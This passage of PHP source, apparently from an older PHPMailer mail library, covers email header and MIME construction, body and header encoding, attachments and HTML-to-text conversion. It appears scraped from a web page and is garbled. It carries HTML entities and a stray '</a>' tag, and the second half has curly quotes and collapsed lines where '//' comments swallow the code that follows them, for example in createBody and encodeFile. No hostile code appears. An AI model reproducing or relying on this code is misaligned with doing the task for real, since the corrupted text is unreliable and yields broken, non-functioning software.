            if (count($this-&gt;to) &gt; 0) {
                if ($this-&gt;Mailer != 'mail') {
                    $result .= $this-&gt;addrAppend('To', $this-&gt;to);
                }
            } elseif (count($this-&gt;cc) == 0) {
                $result .= $this-&gt;headerLine('To', 'undisclosed-recipients:;');
            }
        }

        $result .= $this-&gt;addrAppend('From', array(array(trim($this-&gt;From), $this-&gt;FromName)));

        // sendmail and mail() extract Cc from the header before sending
        if (count($this-&gt;cc) &gt; 0) {
            $result .= $this-&gt;addrAppend('Cc', $this-&gt;cc);
        }

        // sendmail and mail() extract Bcc from the header before sending
        if ((
                $this-&gt;Mailer == 'sendmail' or $this-&gt;Mailer == 'qmail' or $this-&gt;Mailer == 'mail'
            )
            and count($this-&gt;bcc) &gt; 0
        ) {
            $result .= $this-&gt;addrAppend('Bcc', $this-&gt;bcc);
        }

        if (count($this-&gt;ReplyTo) &gt; 0) {
            $result .= $this-&gt;addrAppend('Reply-To', $this-&gt;ReplyTo);
        }

        // mail() sets the subject itself
        if ($this-&gt;Mailer != 'mail') {
            $result .= $this-&gt;headerLine('Subject', $this-&gt;encodeHeader($this-&gt;secureHeader($this-&gt;Subject)));
        }

        if ($this-&gt;MessageID != '') {
            $this-&gt;lastMessageID = $this-&gt;MessageID;
        } else {
            $this-&gt;lastMessageID = sprintf('&lt;%s@%s&gt;', $uniq_id, $this-&gt;ServerHostname());
        }
        $result .= $this-&gt;HeaderLine('Message-ID', $this-&gt;lastMessageID);
        $result .= $this-&gt;headerLine('X-Priority', $this-&gt;Priority);
        if ($this-&gt;XMailer == '') {
            $result .= $this-&gt;headerLine(
                'X-Mailer',
                'PHPMailer ' . $this-&gt;Version . ' (https://github.com/PHPMailer/PHPMailer/)'
            );
        } else {
            $myXmailer = trim($this-&gt;XMailer);
            if ($myXmailer) {
                $result .= $this-&gt;headerLine('X-Mailer', $myXmailer);
            }
        }

        if ($this-&gt;ConfirmReadingTo != '') {
            $result .= $this-&gt;headerLine('Disposition-Notification-To', '&lt;' . trim($this-&gt;ConfirmReadingTo) . '&gt;');
        }

        // Add custom headers
        for ($index = 0; $index &lt; count($this-&gt;CustomHeader); $index++) {
            $result .= $this-&gt;headerLine(
                trim($this-&gt;CustomHeader[$index][0]),
                $this-&gt;encodeHeader(trim($this-&gt;CustomHeader[$index][1]))
            );
        }
        if (!$this-&gt;sign_key_file) {
            $result .= $this-&gt;headerLine('MIME-Version', '1.0');
            $result .= $this-&gt;getMailMIME();
        }

        return $result;
    }

    public function getMailMIME()
    {
        $result = '';
        $ismultipart = true;
        switch ($this-&gt;message_type) {
            case 'inline':
                $result .= $this-&gt;headerLine('Content-Type', 'multipart/related;');
                $result .= $this-&gt;textLine("\tboundary=\"" . $this-&gt;boundary[1] . '"');
                break;
            case 'attach':
            case 'inline_attach':
            case 'alt_attach':
            case 'alt_inline_attach':
                $result .= $this-&gt;headerLine('Content-Type', 'multipart/mixed;');
                $result .= $this-&gt;textLine("\tboundary=\"" . $this-&gt;boundary[1] . '"');
                break;
            case 'alt':
            case 'alt_inline':
                $result .= $this-&gt;headerLine('Content-Type', 'multipart/alternative;');
                $result .= $this-&gt;textLine("\tboundary=\"" . $this-&gt;boundary[1] . '"');
                break;
            default:
                // Catches case 'plain': and case '':
                $result .= $this-&gt;textLine('Content-Type: ' . $this-&gt;ContentType . '; charset=' . $this-&gt;CharSet);
                $ismultipart = false;
                break;
        }
        // RFC1341 part 5 says 7bit is assumed if not specified
        if ($this-&gt;Encoding != '7bit') {
            // RFC 2045 section 6.4 says multipart MIME parts may only use 7bit, 8bit or binary CTE
            if ($ismultipart) {
                if ($this-&gt;Encoding == '8bit') {
                    $result .= $this-&gt;headerLine('Content-Transfer-Encoding', '8bit');
                }
                // The only remaining alternatives are quoted-printable and base64, which are both 7bit compatible
            } else {
                $result .= $this-&gt;headerLine('Content-Transfer-Encoding', $this-&gt;Encoding);
            }
        }

        if ($this-&gt;Mailer != 'mail') {
            $result .= $this-&gt;LE;
        }

        return $result;
    }

    public function getSentMIMEMessage()
    {
        return $this-&gt;MIMEHeader . $this-&gt;mailHeader . self::CRLF . $this-&gt;MIMEBody;
    }


    public function createBody()
    {
        $body = '';

        if ($this-&gt;sign_key_file) {
            $body .= $this-&gt;getMailMIME() . $this-&gt;LE;
        }

        $this-&gt;setWordWrap();

        $bodyEncoding = $this-&gt;Encoding;
        $bodyCharSet = $this-&gt;CharSet;
        if ($bodyEncoding == '8bit' and !$this-&gt;has8bitChars($this-&gt;Body)) {
            $bodyEncoding = '7bit';
            $bodyCharSet = 'us-ascii';
        }
        $altBodyEncoding = $this-&gt;Encoding;
        $altBodyCharSet = $this-&gt;CharSet;
        if ($altBodyEncoding == '8bit' and !$this-&gt;has8bitChars($this-&gt;AltBody)) {
            $altBodyEncoding = '7bit';
            $altBodyCharSet = 'us-ascii';
        }
        switch ($this-&gt;message_type) {
            case 'inline':
                $body .= $this-&gt;getBoundary($this-&gt;boundary[1], $bodyCharSet, '', $bodyEncoding);
                $body .= $this-&gt;encodeString($this-&gt;Body, $bodyEncoding);
                $body .= $this-&gt;LE . $this-&gt;LE;
                $body .= $this-&gt;attachAll('inline', $this-&gt;boundary[1]);
                break;
            case 'attach':
                $body .= $this-&gt;getBoundary($this-&gt;boundary[1], $bodyCharSet, '', $bodyEncoding);
                $body .= $this-&gt;encodeString($this-&gt;Body, $bodyEncoding);
                $body .= $this-&gt;LE . $this-&gt;LE;
                $body .= $this-&gt;attachAll('attachment', $this-&gt;boundary[1]);
                break;
            case 'inline_attach':
                $body .= $this-&gt;textLine('--' . $this-&gt;boundary[1]);
                $body .= $this-&gt;headerLine('Content-Type', 'multipart/related;');
                $body .= $this-&gt;textLine("\tboundary=\"" . $this-&gt;boundary[2] . '"');
                $body .= $this-&gt;LE;
                $body .= $this-&gt;getBoundary($this-&gt;boundary[2], $bodyCharSet, '', $bodyEncoding);
                $body .= $this-&gt;encodeString($this-&gt;Body, $bodyEncoding);
                $body .= $this-&gt;LE . $this-&gt;LE;
                $body .= $this-&gt;attachAll('inline', $this-&gt;boundary[2]);
                $body .= $this-&gt;LE;
                $body .= $this-&gt;attachAll('attachment', $this-&gt;boundary[1]);
                break;
            case 'alt':
                $body .= $this-&gt;getBoundary($this-&gt;boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this-&gt;encodeString($this-&gt;AltBody, $altBodyEncoding);
                $body .= $this-&gt;LE . $this-&gt;LE;
                $body .= $this-&gt;getBoundary($this-&gt;boundary[1], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this-&gt;encodeString($this-&gt;Body, $bodyEncoding);
                $body .= $this-&gt;LE . $this-&gt;LE;
                if (!empty($this-&gt;Ical)) {
                    $body .= $this-&gt;getBoundary($this-&gt;boundary[1], '', 'text/calendar; method=REQUEST', '');
                    $body .= $this-&gt;encodeString($this-&gt;Ical, $this-&gt;Encoding);
                    $body .= $this-&gt;LE . $this-&gt;LE;
                }
                $body .= $this-&gt;endBoundary($this-&gt;boundary[1]);
                break;
            case 'alt_inline':
                $body .= $this-&gt;getBoundary($this-&gt;boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this-&gt;encodeString($this-&gt;AltBody, $altBodyEncoding);
                $body .= $this-&gt;LE . $this-&gt;LE;
                $body .= $this-&gt;textLine('--' . $this-&gt;boundary[1]);
                $body .= $this-&gt;headerLine('Content-Type', 'multipart/related;');
                $body .= $this-&gt;textLine("\tboundary=\"" . $this-&gt;boundary[2] . '"');
                $body .= $this-&gt;LE;
                $body .= $this-&gt;getBoundary($this-&gt;boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this-&gt;encodeString($this-&gt;Body, $bodyEncoding);
                $body .= $this-&gt;LE . $this-&gt;LE;
                $body .= $this-&gt;attachAll('inline', $this-&gt;boundary[2]);
                $body .= $this-&gt;LE;
                $body .= $this-&gt;endBoundary($this-&gt;boundary[1]);
                break;
            case 'alt_attach':
                $body .= $this-&gt;textLine('--' . $this-&gt;boundary[1]);
                $body .= $this-&gt;headerLine('Content-Type', 'multipart/alternative;');
                $body .= $this-&gt;textLine("\tboundary=\"" . $this-&gt;boundary[2] . '"');
                $body .= $this-&gt;LE;
                $body .= $this-&gt;getBoundary($this-&gt;boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this-&gt;encodeString($this-&gt;AltBody, $altBodyEncoding);
                $body .= $this-&gt;LE . $this-&gt;LE;
                $body .= $this-&gt;getBoundary($this-&gt;boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this-&gt;encodeString($this-&gt;Body, $bodyEncoding);
                $body .= $this-&gt;LE . $this-&gt;LE;
                $body .= $this-&gt;endBoundary($this-&gt;boundary[2]);
                $body .= $this-&gt;LE;
                $body .= $this-&gt;attachAll('attachment', $this-&gt;boundary[1]);
                break;
            case 'alt_inline_attach':
                $body .= $this-&gt;textLine('--' . $this-&gt;boundary[1]);
                $body .= $this-&gt;headerLine('Content-Type', 'multipart/alternative;');
                $body .= $this-&gt;textLine("\tboundary=\"" . $this-&gt;boundary[2] . '"');
                $body .= $this-&gt;LE;
                $body .= $this-&gt;getBoundary($this-&gt;boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this-&gt;encodeString($this-&gt;AltBody, $altBodyEncoding);
                $body .= $this-&gt;LE . $this-&gt;LE;
                $body .= $this-&gt;textLine('--' . $this-&gt;boundary[2]);
                $body .= $this-&gt;headerLine('Content-Type', 'multipart/related;');
                $body .= $this-&gt;textLine("\tboundary=\"" . $this-&gt;boundary[3] . '"');
                $body .= $this-&gt;LE;
                $body .= $this-&gt;getBoundary($this-&gt;boundary[3], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this-&gt;encodeString($this-&gt;Body, $bodyEncoding);
                $body .= $this-&gt;LE . $this-&gt;LE;
                $body .= $this-&gt;attachAll('inline', $this-&gt;boundary[3]);
                $body .= $this-&gt;LE;
                $body .= $this-&gt;endBoundary($this-&gt;boundary[2]);
                $body .= $this-&gt;LE;
                $body .= $this-&gt;attachAll('attachment', $this-&gt;boundary[1]);
                break;
            default:
                // catch case 'plain' and case ''
                $body .= $this-&gt;encodeString($this-&gt;Body, $bodyEncoding);
                break;
        }

        if ($this-&gt;isError()) {
            $body = '';
        } elseif ($this-&gt;sign_key_file) {
            try {
                if (!defined('PKCS7_TEXT')) {
                    throw new phpmailerException($this-&gt;lang('signing') . ' OpenSSL extension missing.');
                }
                // @TODO would be nice to use php://temp streams here, but need to wrap for PHP &lt; 5.1                 $file = tempnam(sys_get_temp_dir(), 'mail');                 if (false === file_put_contents($file, $body)) {                     throw new phpmailerException($this-&gt;lang('signing') . ' Could not write temp file');
                }
                $signed = tempnam(sys_get_temp_dir(), 'signed');
                if (@openssl_pkcs7_sign(
                    $file,
                    $signed,
                    'file://' . realpath($this-&gt;sign_cert_file),
                    array('file://' . realpath($this-&gt;sign_key_file), $this-&gt;sign_key_pass),
                    null
                )
                ) {
                    @unlink($file);
                    $body = file_get_contents($signed);
                    @unlink($signed);
                } else {
                    @unlink($file);
                    @unlink($signed);
                    throw new phpmailerException($this-&gt;lang('signing') . openssl_error_string());
                }
            } catch (phpmailerException $exc) {
                $body = '';
                if ($this-&gt;exceptions) {
                    throw $exc;
                }
            }
        }
        return $body;
    }

    protected function getBoundary($boundary, $charSet, $contentType, $encoding)
    {
        $result = '';
        if ($charSet == '') {
            $charSet = $this-&gt;CharSet;
        }
        if ($contentType == '') {
            $contentType = $this-&gt;ContentType;
        }
        if ($encoding == '') {
            $encoding = $this-&gt;Encoding;
        }
        $result .= $this-&gt;textLine('--' . $boundary);
        $result .= sprintf('Content-Type: %s; charset=%s', $contentType, $charSet);
        $result .= $this-&gt;LE;
        // RFC1341 part 5 says 7bit is assumed if not specified
        if ($encoding != '7bit') {
            $result .= $this-&gt;headerLine('Content-Transfer-Encoding', $encoding);
        }
        $result .= $this-&gt;LE;

        return $result;
    }

    protected function endBoundary($boundary)
    {
        return $this-&gt;LE . '--' . $boundary . '--' . $this-&gt;LE;
    }

    protected function setMessageType()
    {
        $type = array();
        if ($this-&gt;alternativeExists()) {
            $type[] = 'alt';
        }
        if ($this-&gt;inlineImageExists()) {
            $type[] = 'inline';
        }
        if ($this-&gt;attachmentExists()) {
            $type[] = 'attach';
        }
        $this-&gt;message_type = implode('_', $type);
        if ($this-&gt;message_type == '') {
            $this-&gt;message_type = 'plain';
        }
    }

    public function headerLine($name, $value)
    {
        return $name . ': ' . $value . $this-&gt;LE;
    }

    public function textLine($value)
    {
        return $value . $this-&gt;LE;
    }

    public function addAttachment($path, $name = '', $encoding = 'base64', $type = '', $disposition = 'attachment')
    {
        try {
            if (!@is_file($path)) {
                throw new phpmailerException($this-&gt;lang('file_access') . $path, self::STOP_CONTINUE);
            }

            // If a MIME type is not specified, try to work it out from the file name
            if ($type == '') {
                $type = self::filenameToType($path);
            }

            $filename = basename($path);
            if ($name == '') {
                $name = $filename;
            }

            $this-&gt;attachment[] = array(
                0 =&gt; $path,
                1 =&gt; $filename,
                2 =&gt; $name,
                3 =&gt; $encoding,
                4 =&gt; $type,
                5 =&gt; false, // isStringAttachment
                6 =&gt; $disposition,
                7 =&gt; 0
            );

        } catch (phpmailerException $exc) {
            $this-&gt;setError($exc-&gt;getMessage());
            $this-&gt;edebug($exc-&gt;getMessage());
            if ($this-&gt;exceptions) {
                throw $exc;
            }
            return false;
        }
        return true;
    }

    public function getAttachments()
    {
        return $this-&gt;attachment;
    }

    protected function attachAll($disposition_type, $boundary)
    {
        // Return text of body
        $mime = array();
        $cidUniq = array();
        $incl = array();

        // Add all attachments
        foreach ($this-&gt;attachment as $attachment) {
            // Check if it is a valid disposition_filter
            if ($attachment[6] == $disposition_type) {
                // Check for string attachment
                $string = '';
                $path = '';
                $bString = $attachment[5];
                if ($bString) {
                    $string = $attachment[0];
                } else {
                    $path = $attachment[0];
                }

                $inclhash = md5(serialize($attachment));
                if (in_array($inclhash, $incl)) {
                    continue;
                }
                $incl[] = $inclhash;
                $name = $attachment[2];
                $encoding = $attachment[3];
                $type = $attachment[4];
                $disposition = $attachment[6];
                $cid = $attachment[7];
                if ($disposition == 'inline' &amp;&amp; isset($cidUniq[$cid])) {
                    continue;
                }
                $cidUniq[$cid] = true;

                $mime[] = sprintf('--%s%s', $boundary, $this-&gt;LE);
                $mime[] = sprintf(
                    'Content-Type: %s; name="%s"%s',
                    $type,
                    $this-&gt;encodeHeader($this-&gt;secureHeader($name)),
                    $this-&gt;LE
                );
                // RFC1341 part 5 says 7bit is assumed if not specified
                if ($encoding != '7bit') {
                    $mime[] = sprintf('Content-Transfer-Encoding: %s%s', $encoding, $this-&gt;LE);
                }

                if ($disposition == 'inline') {
                    $mime[] = sprintf('Content-ID: &lt;%s&gt;%s', $cid, $this-&gt;LE);
                }

                // If a filename contains any of these chars, it should be quoted,
                // but not otherwise: RFC2183 &amp; RFC2045 5.1
                // Fixes a warning in IETF's msglint MIME checker
                // Allow for bypassing the Content-Disposition header totally
                if (!(empty($disposition))) {
                    $encoded_name = $this-&gt;encodeHeader($this-&gt;secureHeader($name));
                    if (preg_match('/[ \(\)&lt;&gt;@,;:\\"\/\[\]\?=]/', $encoded_name)) {
                        $mime[] = sprintf(
                            'Content-Disposition: %s; filename="%s"%s',
                            $disposition,
                            $encoded_name,
                            $this-&gt;LE . $this-&gt;LE
                        );
                    } else {
                        $mime[] = sprintf(
                            'Content-Disposition: %s; filename=%s%s',
                            $disposition,
                            $encoded_name,
                            $this-&gt;LE . $this-&gt;LE
                        );
                    }
                } else {
                    $mime[] = $this-&gt;LE;
                }

                // Encode as string attachment
                if ($bString) {
                    $mime[] = $this-&gt;encodeString($string, $encoding);
                    if ($this-&gt;isError()) {
                        return '';
                    }
                    $mime[] = $this-&gt;LE . $this-&gt;LE;
                } else {
                    $mime[] = $this-&gt;encodeFile($path, $encoding);
                    if ($this-&gt;isError()) {
                        return '';
                    }
                    $mime[] = $this-&gt;LE . $this-&gt;LE;
                }
            }
        }

        $mime[] = sprintf('--%s--%s', $boundary, $this-&gt;LE);

        return implode('', $mime);
    }

    protected function encodeFile($path, $encoding = 'base64')
    {
        try {
            if (!is_readable($path)) {
                throw new phpmailerException($this-&gt;lang('file_open') . $path, self::STOP_CONTINUE);
            }
            $magic_quotes = get_magic_quotes_runtime();
            if ($magic_quotes) {
                if (version_compare(PHP_VERSION, '5.3.0', '&lt;')) {                     set_magic_quotes_runtime(false);                 } else {                     ini_set('magic_quotes_runtime', 0);                 }             }             $file_buffer = file_get_contents($path);             $file_buffer = $this-&gt;encodeString($file_buffer, $encoding);
            if ($magic_quotes) {
                if (version_compare(PHP_VERSION, '5.3.0', '&lt;')) {                     set_magic_quotes_runtime($magic_quotes);                 } else {                     ini_set('magic_quotes_runtime', ($magic_quotes?'1':'0'));                 }             }             return $file_buffer;         } catch (Exception $exc) {             $this-&gt;setError($exc-&gt;getMessage());
            return '';
        }
    }

    public function encodeString($str, $encoding = 'base64')
    {
        $encoded = '';
        switch (strtolower($encoding)) {
            case 'base64':
                $encoded = chunk_split(base64_encode($str), 76, $this-&gt;LE);
                break;
            case '7bit':
            case '8bit':
                $encoded = $this-&gt;fixEOL($str);
                // Make sure it ends with a line break
                if (substr($encoded, -(strlen($this-&gt;LE))) != $this-&gt;LE) {
                    $encoded .= $this-&gt;LE;
                }
                break;
            case 'binary':
                $encoded = $str;
                break;
            case 'quoted-printable':
                $encoded = $this-&gt;encodeQP($str);
                break;
            default:
                $this-&gt;setError($this-&gt;lang('encoding') . $encoding);
                break;
        }
        return $encoded;
    }

    public function encodeHeader($str, $position = 'text')
    {
        $matchcount = 0;
        switch (strtolower($position)) {
            case 'phrase':
                if (!preg_match('/[\200-\377]/', $str)) {
                    // Can't use addslashes as we don't know the value of magic_quotes_sybase
                    $encoded = addcslashes($str, "\0..\37\177\\\"");
                    if (($str == $encoded) &amp;&amp; !preg_match('/[^A-Za-z0-9!#$%&amp;\'*+\/=?^_`{|}~ -]/', $str)) {
                        return ($encoded);
                    } else {
                        return ("\"$encoded\"");
                    }
                }
                $matchcount = preg_match_all('/[^\040\041\043-\133\135-\176]/', $str, $matches);
                break;
            /** @noinspection PhpMissingBreakStatementInspection */
            case 'comment':
                $matchcount = preg_match_all('/[()"]/', $str, $matches);
                // Intentional fall-through
            case 'text':
            default:
                $matchcount += preg_match_all('/[\000-\010\013\014\016-\037\177-\377]/', $str, $matches);
                break;
        }

        if ($matchcount == 0) { // There are no chars that need encoding
            return ($str);
        }

        $maxlen = 75 - 7 - strlen($this-&gt;CharSet);
        // Try to select the encoding which should produce the shortest output
        if ($matchcount &gt; strlen($str) / 3) {
            // More than a third of the content will need encoding, so B encoding will be most efficient
            $encoding = 'B';
            if (function_exists('mb_strlen') &amp;&amp; $this-&gt;hasMultiBytes($str)) {
                $encoded = $this-&gt;base64EncodeWrapMB($str, "\n");
            } else {
                $encoded = base64_encode($str);
                $maxlen -= $maxlen % 4;
                $encoded = trim(chunk_split($encoded, $maxlen, "\n"));
            }
        } else {
            $encoding = 'Q';
            $encoded = $this-&gt;encodeQ($str, $position);
            $encoded = $this-&gt;wrapText($encoded, $maxlen, true);
            $encoded = str_replace('=' . self::CRLF, "\n", trim($encoded));
        }

        $encoded = preg_replace('/^(.*)$/m', ' =?' . $this-&gt;CharSet . "?$encoding?\\1?=", $encoded);
        $encoded = trim(str_replace("\n", $this-&gt;LE, $encoded));

        return $encoded;
    }


    public function hasMultiBytes($str)
    {
        if (function_exists('mb_strlen')) {
            return (strlen($str) &gt; mb_strlen($str, $this-&gt;CharSet));
        } else { // Assume no multibytes (we can't handle without mbstring functions anyway)
            return false;
        }
    }


    public function has8bitChars($text)
    {
        return (boolean)preg_match('/[\x80-\xFF]/', $text);
    }


    public function base64EncodeWrapMB($str, $linebreak = null)
    {
        $start = '=?' . $this-&gt;CharSet . '?B?';
        $end = '?=';
        $encoded = '';
        if ($linebreak === null) {
            $linebreak = $this-&gt;LE;
        }

        $mb_length = mb_strlen($str, $this-&gt;CharSet);
        // Each line must have length &lt;= 75, including $start and $end
        $length = 75 - strlen($start) - strlen($end);
        // Average multi-byte ratio
        $ratio = $mb_length / strlen($str);
        // Base64 has a 4:3 ratio
        $avgLength = floor($length * $ratio * .75);

        for ($i = 0; $i &lt; $mb_length; $i += $offset) {             $lookBack = 0;             do {                 $offset = $avgLength - $lookBack;                 $chunk = mb_substr($str, $i, $offset, $this-&gt;CharSet);
                $chunk = base64_encode($chunk);
                $lookBack++;
            } while (strlen($chunk) &gt; $length);
            $encoded .= $chunk . $linebreak;
        }

        // Chomp the last linefeed
        $encoded = substr($encoded, 0, -strlen($linebreak));
        return $encoded;
    }


    public function encodeQP($string, $line_max = 76)
    {
        if (function_exists('quoted_printable_encode')) { // Use native function if it's available (&gt;= PHP5.3)
            return $this-&gt;fixEOL(quoted_printable_encode($string));
        }
        // Fall back to a pure PHP implementation
        $string = str_replace(
            array('%20', '%0D%0A.', '%0D%0A', '%'),
            array(' ', "\r\n=2E", "\r\n", '='),
            rawurlencode($string)
        );
        $string = preg_replace('/[^\r\n]{' . ($line_max - 3) . '}[^=\r\n]{2}/', "$0=\r\n", $string);
        return $this-&gt;fixEOL($string);
    }


    public function encodeQPphp(
        $string,
        $line_max = 76,
        /** @noinspection PhpUnusedParameterInspection */ $space_conv = false
    ) {
        return $this-&gt;encodeQP($string, $line_max);
    }


    public function encodeQ($str, $position = 'text')
    {
        // There should not be any EOL in the string
        $pattern = '';
        $encoded = str_replace(array("\r", "\n"), '', $str);
        switch (strtolower($position)) {
            case 'phrase':
                // RFC 2047 section 5.3
                $pattern = '^A-Za-z0-9!*+\/ -';
                break;
            /** @noinspection PhpMissingBreakStatementInspection */
            case 'comment':
                // RFC 2047 section 5.2
                $pattern = '\(\)"';

            case 'text':
            default:

                $pattern = '\000-\011\013\014\016-\037\075\077\137\177-\377' . $pattern;
                break;
        }
        $matches = array();
        if (preg_match_all("/[{$pattern}]/", $encoded, $matches)) {

            $eqkey = array_search('=', $matches[0]);
            if (false !== $eqkey) {
                unset($matches[0][$eqkey]);
                array_unshift($matches[0], '=');
            }
            foreach (array_unique($matches[0]) as $char) {
                $encoded = str_replace($char, '=' . sprintf('%02X', ord($char)), $encoded);
            }
        }
        // Replace every spaces to _ (more readable than =20)
        return str_replace(' ', '_', $encoded);
    }


    public function addStringAttachment(
        $string,
        $filename,
        $encoding = 'base64',
        $type = '',
        $disposition = 'attachment'
    ) {
        // If a MIME type is not specified, try to work it out from the file name
        if ($type == '') {
            $type = self::filenameToType($filename);
        }
        // Append to $attachment array
        $this-&gt;attachment[] = array(
            0 =&gt; $string,
            1 =&gt; $filename,
            2 =&gt; basename($filename),
            3 =&gt; $encoding,
            4 =&gt; $type,
            5 =&gt; true, // isStringAttachment
            6 =&gt; $disposition,
            7 =&gt; 0
        );
    }

    public function addEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = '', $disposition = 'inline')
    {
        if (!@is_file($path)) {
            $this-&gt;setError($this-&gt;lang('file_access') . $path);
            return false;
        }

        // If a MIME type is not specified, try to work it out from the file name
        if ($type == '') {
            $type = self::filenameToType($path);
        }

        $filename = basename($path);
        if ($name == '') {
            $name = $filename;
        }

        // Append to $attachment array
        $this-&gt;attachment[] = array(
            0 =&gt; $path,
            1 =&gt; $filename,
            2 =&gt; $name,
            3 =&gt; $encoding,
            4 =&gt; $type,
            5 =&gt; false, // isStringAttachment
            6 =&gt; $disposition,
            7 =&gt; $cid
        );
        return true;
    }


    public function addStringEmbeddedImage(
        $string,
        $cid,
        $name = '',
        $encoding = 'base64',
        $type = '',
        $disposition = 'inline'
    ) {
        // If a MIME type is not specified, try to work it out from the name
        if ($type == '') {
            $type = self::filenameToType($name);
        }

        // Append to $attachment array
        $this-&gt;attachment[] = array(
            0 =&gt; $string,
            1 =&gt; $name,
            2 =&gt; $name,
            3 =&gt; $encoding,
            4 =&gt; $type,
            5 =&gt; true, // isStringAttachment
            6 =&gt; $disposition,
            7 =&gt; $cid
        );
        return true;
    }

    public function inlineImageExists()
    {
        foreach ($this-&gt;attachment as $attachment) {
            if ($attachment[6] == 'inline') {
                return true;
            }
        }
        return false;
    }

    public function attachmentExists()
    {
        foreach ($this-&gt;attachment as $attachment) {
            if ($attachment[6] == 'attachment') {
                return true;
            }
        }
        return false;
    }

    public function alternativeExists()
    {
        return !empty($this-&gt;AltBody);
    }

    public function clearAddresses()
    {
        foreach ($this-&gt;to as $to) {
            unset($this-&gt;all_recipients[strtolower($to[0])]);
        }
        $this-&gt;to = array();
    }

    public function clearCCs()
    {
        foreach ($this-&gt;cc as $cc) {
            unset($this-&gt;all_recipients[strtolower($cc[0])]);
        }
        $this-&gt;cc = array();
    }

    public function clearBCCs()
    {
        foreach ($this-&gt;bcc as $bcc) {
            unset($this-&gt;all_recipients[strtolower($bcc[0])]);
        }
        $this-&gt;bcc = array();
    }

    public function clearReplyTos()
    {
        $this-&gt;ReplyTo = array();
    }


    public function clearAllRecipients()
    {
        $this-&gt;to = array();
        $this-&gt;cc = array();
        $this-&gt;bcc = array();
        $this-&gt;all_recipients = array();
    }

    public function clearAttachments()
    {
        $this-&gt;attachment = array();
    }

    public function clearCustomHeaders()
    {
        $this-&gt;CustomHeader = array();
    }

    protected function setError($msg)
    {
        $this-&gt;error_count++;
        if ($this-&gt;Mailer == 'smtp' and !is_null($this-&gt;smtp)) {
            $lasterror = $this-&gt;smtp-&gt;getError();
            if (!empty($lasterror) and array_key_exists('smtp_msg', $lasterror)) {
                $msg .= '</a>

‘ . $this->lang(‘smtp_error’) . $lasterror[‘smtp_msg’] . ”

\n”; } } $this->ErrorInfo = $msg; } public static function rfcDate() { // Set the time zone to whatever the default is to avoid 500 errors // Will default to UTC if it’s not set properly in php.ini date_default_timezone_set(@date_default_timezone_get()); return date(‘D, j M Y H:i:s O’); } protected function serverHostname() { $result = ‘localhost.localdomain’; if (!empty($this->Hostname)) { $result = $this->Hostname; } elseif (isset($_SERVER) and array_key_exists(‘SERVER_NAME’, $_SERVER) and !empty($_SERVER[‘SERVER_NAME’])) { $result = $_SERVER[‘SERVER_NAME’]; } elseif (function_exists(‘gethostname’) && gethostname() !== false) { $result = gethostname(); } elseif (php_uname(‘n’) !== false) { $result = php_uname(‘n’); } return $result; } protected function lang($key) { if (count($this->language) < 1) { $this->setLanguage(‘en’); // set the default language } if (isset($this->language[$key])) { return $this->language[$key]; } else { return ‘Language string failed to load: ‘ . $key; } } public function isError() { return ($this->error_count > 0); } public function fixEOL($str) { // Normalise to \n $nstr = str_replace(array(“\r\n”, “\r”), “\n”, $str); // Now convert LE as needed if ($this->LE !== “\n”) { $nstr = str_replace(“\n”, $this->LE, $nstr); } return $nstr; } public function addCustomHeader($name, $value = null) { if ($value === null) { // Value passed in as name:value $this->CustomHeader[] = explode(‘:’, $name, 2); } else { $this->CustomHeader[] = array($name, $value); } } public function msgHTML($message, $basedir = ”, $advanced = false) { preg_match_all(‘/(src|background)=[“\’](.*)[“\’]/Ui’, $message, $images); if (isset($images[2])) { foreach ($images[2] as $imgindex => $url) { // Convert data URIs into embedded images if (preg_match(‘#^data:(image[^;,]*)(;base64)?,#’, $url, $match)) { $data = substr($url, strpos($url, ‘,’)); if ($match[2]) { $data = base64_decode($data); } else { $data = rawurldecode($data); } $cid = md5($url) . ‘@phpmailer.0’; // RFC2392 S 2 if ($this->addStringEmbeddedImage($data, $cid, ”, ‘base64’, $match[1])) { $message = str_replace( $images[0][$imgindex], $images[1][$imgindex] . ‘=”cid:’ . $cid . ‘”‘, $message ); } } elseif (!preg_match(‘#^[A-z]+://#’, $url)) { // Do not change urls for absolute images (thanks to corvuscorax) $filename = basename($url); $directory = dirname($url); if ($directory == ‘.’) { $directory = ”; } $cid = md5($url) . ‘@phpmailer.0’; // RFC2392 S 2 if (strlen($basedir) > 1 && substr($basedir, -1) != ‘/’) { $basedir .= ‘/’; } if (strlen($directory) > 1 && substr($directory, -1) != ‘/’) { $directory .= ‘/’; } if ($this->addEmbeddedImage( $basedir . $directory . $filename, $cid, $filename, ‘base64’, self::_mime_types((string)self::mb_pathinfo($filename, PATHINFO_EXTENSION)) ) ) { $message = preg_replace( ‘/’ . $images[1][$imgindex] . ‘=[“\’]’ . preg_quote($url, ‘/’) . ‘[“\’]/Ui’, $images[1][$imgindex] . ‘=”cid:’ . $cid . ‘”‘, $message ); } } } } $this->isHTML(true); // Convert all message body line breaks to CRLF, makes quoted-printable encoding work much better $this->Body = $this->normalizeBreaks($message); $this->AltBody = $this->normalizeBreaks($this->html2text($message, $advanced)); if (empty($this->AltBody)) { $this->AltBody = ‘To view this email message, open it in a program that understands HTML!’ . self::CRLF . self::CRLF; } return $this->Body; } public function html2text($html, $advanced = false) { if (is_callable($advanced)) { return call_user_func($advanced, $html); } return html_entity_decode( trim(custom_strip_tags(preg_replace(‘/<(head|title|style|script)[^>]*>.*?<\/\\1>/si’, ”, $html))), ENT_QUOTES, $this->CharSet ); } public static function _mime_types($ext = ”) { $mimes = array( ‘xl’ => ‘application/excel’, ‘js’ => ‘application/javascript’, ‘hqx’ => ‘application/mac-binhex40’, ‘cpt’ => ‘application/mac-compactpro’, ‘bin’ => ‘application/macbinary’, ‘doc’ => ‘application/msword’, ‘word’ => ‘application/msword’, ‘class’ => ‘application/octet-stream’, ‘dll’ => ‘application/octet-stream’, ‘dms’ => ‘application/octet-stream’, ‘exe’ => ‘application/octet-stream’, ‘lha’ => ‘application/octet-stream’, ‘lzh’ => ‘application/octet-stream’, ‘psd’ => ‘application/octet-stream’, ‘sea’ => ‘application/octet-stream’, ‘so’ 